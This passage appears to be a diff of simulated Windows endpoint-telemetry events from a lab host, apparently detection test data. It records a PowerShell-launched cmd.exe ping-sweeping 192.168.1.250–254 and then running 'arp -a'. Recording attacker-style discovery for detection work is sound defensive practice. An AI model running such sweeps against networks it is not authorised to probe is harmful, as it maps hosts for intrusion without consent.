"msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "process", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573212290000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.250", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2244, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573212510000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212450016, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573212610000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "event_type": "process", + "pid": 2244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573216840000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.251", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2988, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573216990000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "event_type": "process", + "pid": 2988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573221830000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.252", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3648, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573221980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "event_type": "process", + "pid": 3648, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573226840000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.253", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5388, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573226980000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "event_type": "process", + "pid": 5388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573227290000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.254", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4220, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573227530000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227450016, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227610000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227610000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573227610000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "process", + "pid": 4220, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573231990000, + "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" + }, + { + "event_type": "process", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573231990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7784, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573232160000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "process", + "pid": 7784, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" + }, + { + "event_type": "file", + "file_name": "CMD.EXE-89305D47.pf", + "file_path": "C:\\Windows\\Prefetch\\CMD.EXE-89305D47.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573232140000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"arp -a\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2008, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573232800000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + 